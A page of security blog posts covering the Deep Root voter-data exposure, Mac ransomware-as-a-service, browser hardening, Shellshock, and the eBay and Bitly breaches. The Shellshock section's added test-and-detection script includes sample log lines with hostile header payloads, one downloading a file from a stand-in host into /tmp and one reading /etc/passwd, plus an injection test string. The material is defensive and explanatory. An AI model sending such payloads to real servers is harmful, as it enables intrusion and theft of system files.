Web Security Updates

Deep Root Analytics: You Don’t Know Us, But We Lost Your Info…


A political data analysis company has exposed 198 million US voter records

Chances are you’ve never heard of Deep Root Analytics, and in this case that may actually be a good thing. The fewer people that know of the GOP data analysis company—the lower the odds your voter records were compromised.

That’s because, according to security firm UpGuard, Deep Root Analytics left a database containing 198 million voter records exposed for the world to see.

To provide a little bit of context, according to US Census information there are approximately 200 million registered American voters. Carl wasn’t a math major, but 198 over 200 is… basically, ALL the voter records.

An UpGuard Cyber Risk analyst named Chris Vickery, who found the files, notified federal authorities who we can only assume wrote a sternly worded letter or some other bureaucratic foolishness.

What? I Read It for the Articles!

A Deep Root spokesman told the celebrity gossip blog, Huffington Post, “we take full responsibility for this situation.”

Deep Root also said that it believes only Vickery accessed the information, which is a lot like when you come home after a hard day’s work, open your son’s bedroom door to say hello and catch him trying to stuff an old Playboy under his mattress. Then when you ask him about it he tells you he only looked at it the one time.

You know, the one time you caught him.

I’m not saying I don’t believe Deep Root Analytics, I’m just—well, actually, yes that is what I’m saying. I don’t believe Deep Root.

Deep Rooted Analysis of Your Personal Information

What’s more frightening than the fact that your personal information – names, addresses, political affiliations – was potentially just compromised by a group whom you never even consented to having possession of your data in the first place?

How about the analysis they were performing on that questionably obtained information?

Vickery downloaded over 1.1 terabytes of unsecured data. What he found was staggering: Deep Root uses 9.5 billion (with a B) data points to build a terrifyingly accurate model of 198 million US voters’ political preferences, using advanced algorithmic modeling across 48 political issues.

Not only does Deep Root have an obscene amount of data about you – data you never even agreed to let it have – that data has been used to profile you and segment you into demographics.

Ok, How Deep Are We Talking Here?

DEEP. Without getting overly political, there was even more valuable data on both the 2008 and 2012 elections available on those servers. This information is potentially way more dangerous than your voter records.

This is information from DataTrust, the “GOP’s exclusive data provider.” There are two sets of 51 files, one for each state and the District of Columbia. Each file, which is in .CSV form, contains 32-character RNC IDs – one for every voter in the database, regardless of affiliation – that link a number of data points together.

The IDs can be used to look up voters by name. For a frame of reference, here is a list of all the .CSV categories:

[Image: Deep Root Web Analysis – the .CSV column categories]

For those who don’t want to parse all of that, these data sets include things like: date of birth, addresses, phone numbers, party affiliations, racial demographics, religious leanings, registration status, income information—even if someone is on the federal “Do Not Call” list.

That data appears to have been used by another GOP analytics group, TargetPoint, to create a model for the 2016 election.

In a 50GB file, each potential voter is scored against 46 columns, each of which contains a policy or candidate that the voter may or may not be likely to vote for. The GOP then uses this information for micro-targeting (both parties do this, it’s not as if the GOP are the only ones performing this analysis).

Here’s a look at the issues you’re being modeled on:

[Image: Deep Root Modeling Data Points – the 46 issue and candidate columns]

Per Dan O’Sullivan, who wrote the UpGuard report and looked himself up: “It is a testament both to their talents, and to the real danger of this exposure, that the results were astoundingly accurate.”

When I read that last quote, I got so scared a little bit of pee came out. That’s a terrifying amount of information. And all that data was exposed online for who knows how long.

But it’s OK, Deep Root believes the only one who accessed it during that time is the guy who reported it.

How reassuring.

Stay cautious, my friends.

MacRansom: First Ever Ransomware-as-a-Service Attack Strikes macOS


The first ransomware-as-a-service portal targeting macOS has been discovered on the Dark Web

Many macOS users thought they were safe from the wave of ransomware attacks (after all, Apple enjoys a great reputation for security), but security researchers have found a macOS ransomware offered through a ransomware-as-a-service (RaaS) portal.

On Windows, ransomware-as-a-service offerings have been around for quite a while now, largely because Windows is the most widely adopted OS globally and so offers the largest pool of victims. Granted, macOS ships with a stronger default security posture than Windows, but contrary to popular belief, that doesn’t mean Apple systems are safe from threats. No system in the world is 100% secure and macOS is no different.

However, this is believed to be the first case of macOS being targeted via a service portal on the Dark Web. A ransomware-as-a-service portal allows wannabe cyber criminals with limited or zero coding skills to attack systems and earn a quick buck. From afar, it looks like a highly lucrative option, so it wouldn’t be surprising to see high school kids having a go at it. All these budding miscreants have to do is contact the author on the Dark Web, obtain the malicious binary and spread it via spam emails.

After encrypting the victim’s files, MacRansom also encrypts com.apple.finder.plist and its own original executable. It then alters the timestamps of the encrypted files, which renders the usual recovery tools useless.

The victim is given seven days to pay the ransom of 0.25 bitcoin (around $700 at the time); after that the encrypted files are destroyed. To get the files decrypted, MacRansom requires the victim to contact the operator at an email address. On receiving payment from the victim, the perpetrator who spread the ransomware must pay 70% of the money to the author and keeps 30% as profit.

Initially, the research team at security firm Fortinet considered this a big, loudmouthed scam, because the “customers” had to contact the developer instead of downloading the malicious files directly. To get to the bottom of it, the Fortinet researchers contacted the author while pretending to be a middle-man and, astonishingly, got a reply from the developer. They found MacRansom on a Tor hidden-service portal, which proclaims it “the most sophisticated Mac ransomware ever.”

Sophisticated? Not so much.

MacRansom can encrypt at most 128 files in one go, using a symmetric encryption technique. This puts a significant restraint on its impact as well as its reach. The researchers at Fortinet described it as far inferior to the ransomware prevalent on Windows. However, ignoring it is not an option, as it is still capable of encrypting valuable files.

It is not the only “service” posing a threat to Apple users, either. MacSpy, a malware-as-a-service (MaaS) offering, is a piece of trojan spyware targeted at Mac users. MacSpy can be found by following the same process, and the same developer is believed to be behind it.

The free variant is used to keep tabs on targeted computers. The attackers record the user’s activity through keylogging, voice recording, interception of data sent to cloud storage and periodic screenshots.

A paid version of MacSpy is reportedly also available, though it is still unclear how many bitcoins it costs. This version is said to do substantially more damage than the free variant. MacSpy is supposedly still in beta, so it is not widespread at this point.

Explaining the reason behind these so-called “services,” the authors point to the rising number of users adopting Macs. As their reason for creating MacSpy as a service, they cite an absence of “sophisticated malware for Mac users”.

At this point, these attacks don’t represent much in terms of their scale and severity but they might be the harbinger of the things to come.

The Essential Security Settings You Must Check in Your Web Browsers


Before you visit another site, make sure your web browser is running with optimal security settings.

Your web browser is essentially your portal to the internet. It is the vehicle you use to travel around the worldwide web.

It’s also your first line of defense when it comes to malware, hackers and cybercrime.

You probably don’t think of your browser in quite that way, but it’s true regardless. That’s why the browser makers – the people behind popular programs like Chrome, Firefox and Internet Explorer (since succeeded by Edge) – work so hard to provide you with security settings to help safeguard you from the dangers of the internet.

And guess what… you probably aren’t using all of those settings.

Here’s a quick guide for enabling essential security settings on three of the biggest browsers—Chrome, Firefox and IE 10.

Google Chrome

[Image: Google Chrome web browser security settings]

There are a number of different settings you’ll need to check in order to optimize security on Chrome. We’ll provide you with a description of each, as well as directions on how to activate them.

  • Enable Phishing and Malware Protection – This seems like it should be a pretty obvious one, but not everyone has it enabled. To do so, simply activate it under the “Privacy” section of the settings menu. It will alert you if you’re about to visit a site Google has flagged for phishing or malware.
  • Disable Instant Search – Sure, it’s incredibly convenient to be able to search just by entering your query in the address bar, but it’s not the most private. With it on, every keystroke you type in the address bar is sent to Google as you type it, including URLs you never end up visiting. You can disable this in the settings menu.
  • Don’t Sync Your Email Account – Once again, what seems like an extremely convenient feature actually makes you less secure. By syncing your Google account with the Chrome browser, you’re allowing Google to store sensitive information like passwords and autofill data on its servers. If you still want to sync, at least turn on the option to encrypt all synced data with your own sync passphrase in the settings menu, so the data is unreadable on Google’s side.
  • Turn Off Autofill and Never Save Passwords – If you’re noticing a theme here, it’s that convenience oftentimes comes at the expense of safety. Yes, it’s nice not having to type in passwords or finish filling in certain fields, but by leaving these settings on you’re letting Chrome keep that information in your profile on disk (and, with sync on, on Google’s servers), where anyone who gets access to your machine or your Google account can pull it out.
  • Other Suggestions
    • Cookies – Choose the option that keeps local data only until you quit your browser and make sure to block third-party cookies.
    • JavaScript – Select the option that prevents sites from running JavaScript, and add exceptions for the sites you trust. Be aware that most modern sites stop working without it, so in practice this is an allow-list you will have to maintain.
    • Pop-ups – This one is pretty obvious, make sure you choose to block pop-ups.
    • Location – Turn off the feature that allows sites to track your location.

Mozilla Firefox

[Image: Mozilla Firefox web browser security warnings]

When enabling settings in Mozilla’s Firefox browser, you can access them through the “Options” menu.

  • Configure Privacy Settings – Again, it should be obvious why you want your privacy settings set up correctly. You can find them under the “Privacy” tab. You’re going to set up Firefox so it stores only as much information as it needs to function properly:
    • Choose “Use custom settings for history.”
    • Unselect “Remember my browsing and download history.”
    • Unselect “Remember search and form history.”
    • Unselect “Accept third-party cookies.”
    • Set the cookie storage option to “Keep until I close Firefox.”
    • Choose “Clear history when Firefox closes.”
  • Configure Security Settings – In order to avoid risky websites and prevent Firefox from storing your passwords, you’ll need to configure your security settings in the “Security” tab.
    • Select “Warn me when sites try to install add-ons.”
    • Select “Block reported attack sites.”
    • Select “Block reported web forgeries.”
    • Unselect “Remember passwords for sites.”
  • Disable JavaScript – Under the “Content” tab, unselect “Enable JavaScript.” Most drive-by exploits and malicious ads need JavaScript to run, so turning it off removes a lot of attack surface, but expect many sites to break; if you need them, re-enable it selectively rather than leaving it on everywhere.
  • Enable Pop-up Blocking – Also under the “Content” tab, you can choose to block pop-ups, which is definitely recommended.
  • Don’t Sync – This isn’t a setting so much as a suggestion: don’t sync. Doing so stores your passwords and history on Mozilla’s servers (encrypted, but still a copy you don’t control).
  • Turn On Automatic Updates – Under the “Update” tab, make sure you’ve enabled the setting that automatically updates Firefox. This ensures your browser keeps getting vital security fixes, which is the single most effective item on this list.
  • Use Secure Protocols – Under “Advanced,” select “Encryption” and make sure TLS is enabled. Do not enable “SSL 3.0”: it is obsolete and broken (the POODLE attack), and “TLS 1.0” should be treated as the bare minimum, not the target. Prefer the newest TLS version your Firefox offers.

Internet Explorer 10

[Image: Internet Explorer web browser security settings]

To access security settings in IE10, go through the “Internet Options” menu.

  • Configure Security Settings – Again, make sure IE10 has the correct security settings selected before browsing with it. To do this, select the “Security” tab.
    • Set Security Zones – This feature lets you select individual security levels for different “zones” such as Internet, Local intranet, Trusted sites and Restricted sites. Spend some time here and select your desired levels.
    • Set Internet zone security to “Medium-high” or above; this blocks unsigned ActiveX controls, prompts before downloads and turns on several other default protections.
    • Disable JavaScript – Under “Custom Level,” find “Active Scripting” and select “Disable.” Again, scripting is where most browser exploits start, but disabling it breaks most sites, so put the sites you need in the Trusted sites zone rather than lowering the Internet zone.
  • Automatically Clear History – Choose “Delete browsing history on exit.” You can find it under the “General” tab.
  • Configure Privacy Settings – Do this under the “Privacy” tab.
    • Set Internet zone privacy to “Medium High” or above.
    • Never allow websites to request your location.
    • Activate the “Pop-up Blocker.”
  • Configure Advanced Security Settings – In the “Security” section under the “Advanced” tab, you can activate some additional security settings:
    • Click “Restore advanced settings” to ensure all default settings are active.
    • Choose “Do not save encrypted pages to disk.”
    • Choose “Empty Temporary Internet Files folder when browser is closed.”
    • Turn off “AutoComplete.”
  • Tracking Protection – In IE10’s “Safety” menu is the Tracking Protection feature. You will need to provide a list of the sites you don’t want your information sent to, or you can download a ready-made list.
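The settings above are all GUI toggles, which is fine for one machine but does not scale and is easily undone by the next click. As an added example that is not part of the original article, the script below writes the Chrome and Firefox choices into the files those browsers read at startup: a user.js in the Firefox profile directory and a managed-policy JSON for Chrome. The pref and policy names are the browsers’ own; the two directories are supplied by the caller, and the file name hardening.json is arbitrary (Chrome reads every .json in its managed policy directory). One deliberate departure from the checklist: the minimum protocol version is set to TLS 1.2 rather than enabling SSL 3.0 or TLS 1.0.

```shell
#!/bin/sh
# Added example (not from the original article): write the Chrome and Firefox
# hardening choices to the files the browsers read at startup.
# Assumes POSIX sh; FIREFOX_PROFILE_DIR and CHROME_POLICY_DIR are supplied by
# the caller. Pref and policy names are the browsers' own.

# Firefox applies every user_pref() in <profile>/user.js on each start
# (about:profiles shows the profile path). Values mirror the checklist above,
# with one correction: TLS 1.2 is the floor, not SSL 3.0 / TLS 1.0.
write_firefox_userjs() {
    profile_dir="$1"
    [ -d "$profile_dir" ] || { echo "no such directory: $profile_dir" >&2; return 1; }
    cat > "$profile_dir/user.js" <<'EOF'
// Block reported attack sites and web forgeries (Safe Browsing)
user_pref("browser.safebrowsing.malware.enabled", true);
user_pref("browser.safebrowsing.phishing.enabled", true);
// Warn when sites try to install add-ons
user_pref("xpinstall.whitelist.required", true);
// Never remember passwords, or search and form history
user_pref("signon.rememberSignons", false);
user_pref("browser.formfill.enable", false);
// Keep no browsing history, and clear what remains when Firefox closes
user_pref("places.history.enabled", false);
user_pref("privacy.sanitize.sanitizeOnShutdown", true);
user_pref("privacy.clearOnShutdown.history", true);
user_pref("privacy.clearOnShutdown.cookies", true);
// Do not accept third-party cookies (1 = block third-party)
user_pref("network.cookie.cookieBehavior", 1);
// Pop-up blocking, no geolocation, automatic updates
user_pref("dom.disable_open_during_load", true);
user_pref("geo.enabled", false);
user_pref("app.update.auto", true);
// Minimum protocol version: 3 = TLS 1.2 (SSL 3.0 and TLS 1.0 stay disabled)
user_pref("security.tls.version.min", 3);
// Disabling JavaScript as the checklist suggests breaks most sites; opt in:
// user_pref("javascript.enabled", false);
EOF
}

# Chrome on Linux reads every *.json in /etc/opt/chrome/policies/managed/ as
# managed policy, which the user cannot override from the settings page.
# (Windows uses the registry, macOS a configuration profile.)
write_chrome_policy() {
    policy_dir="$1"
    [ -d "$policy_dir" ] || { echo "no such directory: $policy_dir" >&2; return 1; }
    # 1 = standard Safe Browsing; 2 = block for the Default*Setting policies.
    # Add "DefaultJavaScriptSetting": 2 to block JavaScript as the text suggests.
    cat > "$policy_dir/hardening.json" <<'EOF'
{
  "SafeBrowsingProtectionLevel": 1,
  "SearchSuggestEnabled": false,
  "SyncDisabled": true,
  "PasswordManagerEnabled": false,
  "AutofillAddressEnabled": false,
  "AutofillCreditCardEnabled": false,
  "BlockThirdPartyCookies": true,
  "DefaultPopupsSetting": 2,
  "DefaultGeolocationSetting": 2
}
EOF
}

# Quick post-deployment checks: how many settings each file carries.
count_firefox_prefs() { grep -c '^user_pref(' "$1/user.js"; }
count_chrome_policies() { grep -c '^  "' "$1/hardening.json"; }

# Usage: sh browser-hardening.sh FIREFOX_PROFILE_DIR CHROME_POLICY_DIR
# With no arguments it does a dry run into a temporary directory.
main() {
    if [ "$#" -eq 2 ]; then
        write_firefox_userjs "$1" && write_chrome_policy "$2"
    else
        tmp=$(mktemp -d)
        write_firefox_userjs "$tmp" && write_chrome_policy "$tmp"
        echo "dry run: $(count_firefox_prefs "$tmp") Firefox prefs," \
             "$(count_chrome_policies "$tmp") Chrome policies written under $tmp"
        rm -rf "$tmp"
    fi
}
main "$@"
```

Run it with the two real directories once you are happy with the dry run; Firefox picks up user.js on its next start and Chrome shows the managed values greyed out at chrome://policy.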

In Closing

These are the recommended safety settings for Google Chrome, Mozilla Firefox and Microsoft Internet Explorer 10. The internet is a dangerous place; the less information you make available to it, the less likely you are to run into trouble.

So make sure you have these settings enabled on your browser. And stay safe!

Enable Two-Factor Authentication – An All-in-One Guide


Everything you need to know about what Two-Factor Authentication is and how to enable it

Two-Factor Authentication is a phenomenal security tool that allows you to add an additional layer of security on top of the password you already use.

It works like this: when you want to sign in to your account on a new device for the first time, you’ll be asked to provide your password in addition to a code sent to a trusted device. Once you offer both forms of verification – the password and the code – your account is unlocked and you can use it as normal.


Shellshock: A Vulnerability More Serious Than Heartbleed?


Understand Vulnerabilities and Their Causes to Secure Your Website

The hits just keep on coming! We have yet again bumped into another software bug that threatens our web security. It has been hardly five months since the discovery of the ‘Heartbleed’ bug, and now another nasty surprise has been uncovered, called ‘Shellshock’.


What is the Shellshock Bug?

The Shellshock bug is the latest vulnerability affecting several versions of the Linux and Unix operating systems. It was discovered by Linux expert Stéphane Chazelas, in the UK, in September 2014. Linux-based routers with a web interface built on the Common Gateway Interface (CGI) have also been found to be vulnerable to Shellshock.

Alternately known as the Bash Bug, Shellshock is likely to be more severe than Heartbleed. According to security experts, attackers can easily exploit the bug in Bash to take complete control of the targeted system. The United States Computer Emergency Readiness Team (US-CERT) of the Department of Homeland Security has issued an alert about this vulnerability, which affects Unix-based operating systems such as Linux along with Apple’s Mac OS X.

How Does the Shellshock Bug Attack?

A remote attacker can exploit Bash under certain circumstances: the attacker only needs to get some application to pass a malicious environment variable to Bash.

Attackers are most likely to take the route through web servers that use the Common Gateway Interface (CGI), a long-established mechanism for creating dynamic web content. A CGI server copies the request headers into environment variables before it runs the handler, so the attacker can use a crafted header to deliver the malicious variable to the target system. When Bash is started to run the handler, it interprets the variable as a function definition and automatically runs the command that was appended after it.

The following diagram depicts how a malicious command can be injected at the end of a legitimate environment variable, which is later run by Bash.

[Image: Shellshock bug table – a malicious command appended to a legitimate environment variable]

Serious consequences follow once an attacker successfully exploits this vulnerability on a server. It may allow attackers to download malware onto the targeted computers or dump password files. Similarly, once inside the victim’s firewall, attackers can compromise and attack other devices on the network.

Why Shellshock is projected to be more harmful than Heartbleed

The severity of this bug can only be understood after highlighting the importance of the component it affects: Bash.

To be precise, Shellshock is a vulnerability in the Bash shell (the “Bourne Again SHell”), a common component of several versions of Linux and UNIX. Bash is a command language interpreter: it lets users type commands into a simple text-based window, and the operating system runs them.

Bash is also used to run commands passed on by other applications, and those applications hand it data through environment variables: named values, set dynamically, that affect how processes run on a computer. Bash allows a function definition to be passed in an environment variable, and the flaw is that it kept parsing, and executing, whatever followed the closing brace of that definition. So an attacker can place a malicious command in the environment variable, and it runs as soon as Bash receives the variable.

On the Common Vulnerability Scoring System (CVSS), Shellshock received a straight 10/10, which makes it one of the biggest and most notorious bugs in the history of the Internet. Given the immense footprint of the Bash shell, a large number of internet-connected devices end up vulnerable to Shellshock: routers, Linux systems, Macs, web servers and so on.

Bash is present on the large majority of Linux and Unix web servers at organizations of every size. Shellshock lets cyber criminals attack a web server remotely and compromise the host. Once the victim organization is compromised, an attacker can completely take over the system, unlike Heartbleed, a bug in OpenSSL, which only let attackers read chunks of a server’s memory, not take control of the system.

Procedure to Check your Computer’s Vulnerability

Rather than fretting about when and how your computer is going to be affected by Shellshock, it is advisable to find out whether or not your computer is actually vulnerable to this bug. Here is a short procedure for that:

  1. Open the terminal on your computer and run the following command:
    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  2. You will see the following if your system is vulnerable to the bug:
    vulnerable
    this is a test
  3. However, if your system is patched, you will see the following instead (a fully patched modern Bash may print no warning at all, just the last line):
    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
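The three-step check above only covers the original bug. As an added example that is not part of the original article, the script below runs that same check, adds a check for the follow-up bug that made the first vendor patches incomplete (the reason for the Red Hat note under the tips below), simulates how a CGI handler hands a request header to Bash, and greps web-server logs for the exploit’s fixed prefix. The CVE identifiers are the real ones for Shellshock (CVE-2014-6271) and for its incomplete-fix follow-up (CVE-2014-7169); the CGI handler, the log lines and the addresses in them are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original article). Assumes a POSIX sh with
# bash, grep and mktemp on PATH. Checks for the original bug and for the
# follow-up that made the first vendor patches incomplete, shows the CGI
# path by which a header reaches bash, and greps for the exploit in logs.

# CVE-2014-6271, the one-liner from the procedure above. A vulnerable bash
# imports x as a function and then keeps executing what follows the brace.
check_cve_2014_6271() {
    command -v bash >/dev/null 2>&1 || { echo "bash not found"; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 2>/dev/null) || true
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# CVE-2014-7169, found after the first fix shipped (why Red Hat re-issued
# its advisory). On a half-patched bash the parser error leaves `>\` in
# effect, so `date` runs with its output redirected into a file named
# "echo"; a fully patched bash creates no file. Runs in a scratch directory.
check_cve_2014_7169() {
    command -v bash >/dev/null 2>&1 || { echo "bash not found"; return 0; }
    tmp=$(mktemp -d) || { echo "mktemp failed"; return 0; }
    ( cd "$tmp" && env X='() { (a)=>\' bash -c "echo date" >/dev/null 2>&1 ) || true
    if [ -e "$tmp/echo" ]; then echo "vulnerable"; else echo "patched"; fi
    rm -rf "$tmp"
}

# The CGI path: a CGI server copies each request header into the
# environment (User-Agent becomes HTTP_USER_AGENT) before it runs the
# handler, so a crafted header is already an exported variable when bash
# starts. Hypothetical handler: takes the header value, prints a response.
cgi_handle_request() {
    command -v bash >/dev/null 2>&1 || { echo "bash not found"; return 0; }
    HTTP_USER_AGENT="$1" bash -c 'printf "Content-Type: text/plain\n\nhello from cgi\n"' 2>/dev/null
}

# Detection: the payload always starts with "() {" because that is what
# bash required to treat the variable as a function. Filters stdin down to
# the suspicious lines.
scan_log_for_shellshock() {
    grep -F '() {'
}

# Constructed sample access-log lines (not real traffic; documentation
# address ranges). Two carry the exploit, one is a normal request.
SAMPLE_LOG='198.51.100.7 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.9/x -O /tmp/x\""
203.0.113.4 - - [25/Sep/2014:10:02:12 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:02:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/cat /etc/passwd"'

count_shellshock_hits() {
    printf '%s\n' "$SAMPLE_LOG" | scan_log_for_shellshock | wc -l | tr -d ' '
}

main() {
    echo "CVE-2014-6271: $(check_cve_2014_6271)"
    echo "CVE-2014-7169: $(check_cve_2014_7169)"
    echo "CGI handler with hostile User-Agent (a vulnerable bash would print INJECTED first):"
    cgi_handle_request '() { :;}; echo INJECTED' || true
    echo "Suspicious log lines: $(count_shellshock_hits) of 3"
}
main
```

On a patched host both checks print “patched” and the CGI handler prints only its own response; on a host where the first check passes but the second prints “vulnerable”, the vendor’s initial patch was applied and the follow-up was not. Pipe a real access log through scan_log_for_shellshock to hunt for attempts against your own CGI endpoints.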

Tips to Reduce the Risks of a Shellshock bug

Users can follow the tips below to reduce the risk of falling prey to this bug:

Online Businesses: All users of Linux/Unix-based systems are advised to apply the patches immediately. The following patches have been released by their respective vendors:

Please note that Red Hat updated its advisory for Shellshock after finding that its initial patch was incomplete.

Consumers: Apply patches to your routers and any other web-enabled devices as and when the vendors provide them.

However, if a patch is not yet available for a particular Linux/Unix distribution, it is recommended to switch to an alternate shell until a proper patch is provided by the vendor. Note that changing your login shell only helps for interactive use: services that invoke /bin/bash explicitly, or /bin/sh on systems where that is a link to Bash, still reach the vulnerable binary.

eBay database hacked, asks users to change passwords


Lately, cyber-criminals seem obsessed with hacking into users’ accounts on popular websites by stealing their login credentials. Last fall it was Adobe Systems Inc and Target Corp; this year, after the link-shortening service Bitly was attacked in May, online shopping giant eBay is the latest name to join the list.

On Wednesday, May 21, 2014, eBay advised the 145 million registered users of its website to change their passwords following a breach of a database containing encrypted passwords and other non-financial data.

The online shopping giant provided some information about how the attackers got in: they gained access to the corporate network by compromising a small number of employee login credentials. However, passwords for eBay’s payment subsidiary PayPal were not compromised in this attack, eBay’s spokeswoman clarified.

According to eBay, the compromise was detected about two weeks ago, though it occurred somewhere between late February and early March. The company chose not to inform its users right away while it investigated the extent of the attack. The spokeswoman said no group has yet claimed responsibility and that the company has found no evidence of unauthorized access to financial or credit card information, as eBay stores that sensitive data separately. The hacked database contained passwords, email addresses, dates of birth, postal addresses and phone numbers. Following news of the attack, eBay’s shares fell on the Nasdaq on Wednesday.

eBay says the breach of its network is in no way related to the ‘Heartbleed’ flaw in OpenSSL recently discovered by security researchers. The company also advises all users who reuse the same password on other sites to change those passwords as well.

Chinese Government bans installation of Windows 8 on government computers



The Chinese government has excluded the Windows 8 operating system from new government computers, much to Microsoft’s ‘surprise’.

China’s decision to exclude Windows 8 from its new government computers came as a major blow to the US technology company, which has long been dealing with sales woes in the country. In a short statement on the website of the Central Government Procurement Center about a specific class of energy-saving products, the agency noted that new government computers were not to have Windows 8 installed.

Observers find the timing interesting, as the news comes at a moment of existing animosity between the US and China. On Monday, the US filed charges against five Chinese military officers for allegedly hacking networks in the US, to which China sharply responded that the US itself has engaged in cyber-spying against China. However, the Chinese government’s decision to nix Windows 8 was taken last week, before the US accusation.

But with seemingly mysterious reasons behind the ban, the Chinese government has to date not explained its motives for banning Windows 8 from public-sector computers. China’s official news agency, Xinhua, claims the ban is a consequence of Microsoft ending support for Windows XP after 13 years. As noted by Reuters, Xinhua has also vaguely cited ‘security measures’ and an ‘effort to save energy’ as potential grounds for the ban, although the relation between Windows 8 and saving energy is highly unclear. There has been no further elaboration from Xinhua or the Government of China. Xinhua also notes that the Chinese government intends to develop and use its own Linux-based operating system.

According to Microsoft’s statements, although it was ‘stunned’ by the Chinese government’s decision to exclude Windows 8, the company would continue to provide Windows 7 to its Chinese government customers. Which OS will replace the still widely used Windows XP remains uncertain.

Bitly accounts got hacked: What to do next?


Stay Safe and Secure for Your Bit.ly Accounts


The URL shortening service Bitly is the latest victim of hackers. According to the latest blog update from its CEO Mark Josephson, titled ‘Urgent Security Update’, the company has reason to believe that its users’ data has been compromised. The affected data consists of e-mail addresses, encrypted passwords, OAuth tokens and API keys.

Josephson writes in the blog that they have no indication that any accounts have been accessed without permission. But as a precaution, the company has asked all users to reset their account passwords. Bitly has also taken the precautionary step of disconnecting linked social media profiles to secure all accounts; users who sign in through Twitter or Facebook will need to reconnect those accounts.

The breach of Bitly accounts could be a lucrative opportunity for cyber-criminals, since most Bitly users link their accounts to Facebook and Twitter profiles, which opens the door to sending spam links and campaigns through the service. However, Bitly has not confirmed any such incident as yet. As a further precaution, if you use the same password for Bitly and any other account, change that password on the other account right away, since the compromised Bitly password could be used to gain access to your other accounts.

As per the blog update, the most important step for all Bitly users is to reset their API key and OAuth token. Below are the step-by-step instructions provided by the company:

1) First of all, log in to your account and click on ‘Your Settings,’ then the ‘Advanced’ tab.

2) Now, at the bottom of the ‘Advanced’ tab’s menu, select ‘Reset’ next to ‘Legacy API key.’

3) Copy down your new API key and change it in all applications. These may include social publishers, share buttons and mobile applications.

4) Now reset your password by going to the ‘Profile’ tab.

5) Disconnect and reconnect any applications that use Bitly. You can now check which accounts are connected under the ‘Connected Accounts’ tab in ‘Your Settings.’

Apart from providing basic information about the breach and a few precautionary steps for users, Bitly chose not to explain how it found out about the breach of customer accounts. Nor has the company shared any details about exactly which information the hackers might have gained access to.

It is important to note that this breach does not affect users who use Bitly only as a basic link-shortening service without signing in. It does affect all registered users who use tools such as saved links, stat tracking and social network sharing. The attack also potentially poses a threat to website publishers who use Bitly to track and share story links.

Josephson signs off the post with an apology for any inconvenience caused and says the team is working hard to make sure all accounts are secure and that they take users’ security very seriously. Users can check for the latest updates on Bitly’s Twitter feed, @Bitly, and can send account-specific questions to the e-mail address given in the blog post.